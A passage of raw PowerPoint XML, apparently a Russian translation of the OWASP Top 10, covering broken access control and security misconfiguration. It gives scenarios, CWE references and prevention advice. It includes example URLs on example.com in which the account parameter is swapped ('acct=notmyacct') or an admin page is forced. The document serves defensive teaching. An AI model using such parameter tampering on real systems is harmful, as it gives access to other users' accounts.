            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pstmt.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>( );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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Злоумышленник изменяет в браузере параметр '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>acct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' для отправки желаемого номера учетной записи. Без должной проверки атакующий может получить доступ к учетной записи любого пользователя.</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a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/app/accountInfo?acct=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>notmyacct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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№2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Злоумышленник задает в браузере целевой URL. Для доступа к странице администрирования требуются права администратора.</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http://example.com/app/getappInfo</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin_getappInfo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Уязвимость существует, если пользователь без аутентификации может получить доступ к этим страницам или если пользователь без прав администратора может получить доступ к странице администрирования.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770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Контроль доступа предполагает наличие политики, определяющей права пользователей. Обход ограничений доступа обычно приводит к несанкционированному разглашению, изменению или уничтожению данных, а также выполнению непредусмотренных полномочиями бизнес-функций. Наиболее распространенные уязвимости контроля доступа включают:</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обход ограничений доступа путем изменения URL, внутреннего состояния приложения или HTML-страницы, а также с помощью специально разработанных API;</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возможность изменения первичного ключа для доступа к записям других пользователей, включая просмотр или редактирование чужой учетной записи;</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повышение привилегий. Выполнение операций с правами пользователя, не входя в систему, или с правами администратора, войдя в систему с правами пользователя;</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манипуляции с метаданными, например, повторное воспроизведение или подмена </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>токенов</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> контроля доступа JWT или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>куки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-файлов, а также изменение скрытых полей для повышения привилегий или некорректное аннулирование JWT;</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несанкционированный доступ к API из-за некорректной настройки </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>междоменного</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> использования </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ресурсов (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin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доступ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>неаутентифицированных</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> пользователей к страницам, требующим аутентификации, или доступ непривилегированных пользователей к привилегированным страницам. Доступ к API с отсутствующим контролем привилегий для </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>POST-, PUT- и DELETE-методов/запросов.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="7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lvl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" b="1" dirty="0">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4"/>
              </a:rPr>
              <a:t> защита OWASP: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V4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Проверка авторизации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7"/>
              </a:rPr>
              <a:t>Памятка OWASP: Контроль доступа</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Сторонние</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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CWE-22: Некорректные ограничения путей для каталогов (Подмена пути)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CWE-284: Некорректное управление доступом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CWE-285: Некорректная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CWE-639: Обход авторизации, используя значение ключа пользователя</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12"/>
              </a:rPr>
              <a:t>PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>: Эксплуатация некорректно настроенного </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>междоменного</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t> использования ресурсов</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Контроль доступа эффективен только при реализации через проверенный код на стороне сервера или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>беcсерверный</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> API, где атакующий не может изменять проверки прав доступа или метаданные. Рекомендуется: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запрещать доступ по умолчанию, за исключением открытых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реализовать механизмы контроля доступа и использовать их во всех приложениях, а также минимизировать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>междоменное</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> использование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контролировать доступ к моделям, используя владение записями, а не возможность пользователей создавать, просматривать, обновлять или удалять любые записи;</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использовать модели доменов для реализации специальных ограничений, относящихся к приложениям;</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отключить вывод списка каталогов веб-сервера, а также обеспечить отсутствие метаданных файлов (например, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) и файлов резервных копий в корневых веб-каталогах;</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регистрировать сбои контроля доступа и уведомлять администраторов при необходимости (например, если сбои повторяются);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ограничивать частоту доступа к API и контроллерам для минимизации ущерба от инструментов автоматизации атак;</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аннулировать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>токены</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> JWT на сервере после выхода из системы.</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Разработчики и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>инженеры по контролю </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>качества </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ПО должны </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>проводить функциональную проверку контроля доступа и тестировать интеграцию.</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A5</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контроля </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>доступа</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69836690"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="22674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20" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Эксплуатация контроля доступа является основным навыком злоумышленников. Инструменты </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="720" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="720" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> и </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="720" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="720" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> могут обнаружить отсутствие контроля доступа, но не могут проверить его работоспособность при его наличии. Наличие контроля доступа можно обнаружить вручную, а его отсутствие можно обнаружить автоматически в некоторых </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="720" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>фреймворках</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="720" dirty="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00" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Уязвимости, связанные с контролем доступа, довольно распространены из-за отсутствия автоматического обнаружения и эффективного функционального тестирования разработчиками.</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680" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Контроль доступа обычно не проверяется автоматическими статическими или динамическими тестами. Тестирование вручную — наилучший способ обнаружения отсутствия или неэффективности контроля доступа, включая методы HTTP (GET, PUT и т. п.), контроллеры, прямые ссылки на объекты и т. д.</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Технические последствия: выполнение злоумышленником действий с правами пользователя или администратора; использование пользователем привилегированных функций; создание, просмотр, обновление или удаление любых записей.</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2730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61610"/>
            <a:ext cx="628650" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3110145" y="1061610"/>
            <a:ext cx="723900" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5499230" y="1186145"/>
            <a:ext cx="628650" cy="190500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId19"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5855880" y="1515872"/>
            <a:ext cx="990600" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20325" y="1515872"/>
            <a:ext cx="990600" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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№1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Сервер приложений поставляется с образцами приложений, которые не удаляются с рабочего сервера. Эти приложения содержат известные уязвимости, позволяющие злоумышленникам скомпрометировать сервер. Если одно из этих приложений является консолью администратора, а стандартные учетные записи не менялись, то атакующий может войти в приложение и перехватить контроль над ним, используя стандартный пароль.</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№2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> На сервере не отключен вывод списка файлов в каталогах, что позволяет злоумышленнику найти и выгрузить скомпилированные </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-классы, после декомпиляции и обратного анализа которых можно просмотреть исходный код. В результате атакующий может обнаружить уязвимости и получить доступ к приложению.</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№3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Сервер приложений настроен на отправку подробных сообщений об ошибках, включая данные о трассировке стека. Это может привести к разглашению важной информации, например, о версии компонента, содержащей известные уязвимости.</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№4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Поставщик облачных услуг использует стандартные разрешения общего доступа через интернет для других пользователей облака. Это позволяет получить доступ к конфиденциальной информации, доступной в облачном хранилище.</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900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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любой из компонентов приложения недостаточно защищен или разрешения облачных сервисов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включены или присутствуют лишние функции (например, неиспользуемые порты, службы, страницы, учетные записи или привилегии);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учетные записи и пароли, создаваемые по умолчанию, используются без изменений;</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обработка ошибок позволяет осуществить трассировку стека или получить слишком подробные сообщения об ошибках;</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отключены или некорректно настроены последние обновления безопасности;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не выбраны безопасные значения параметров защиты серверов приложений, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>фреймворков</a:t>
            </a:r>
            <a:r>
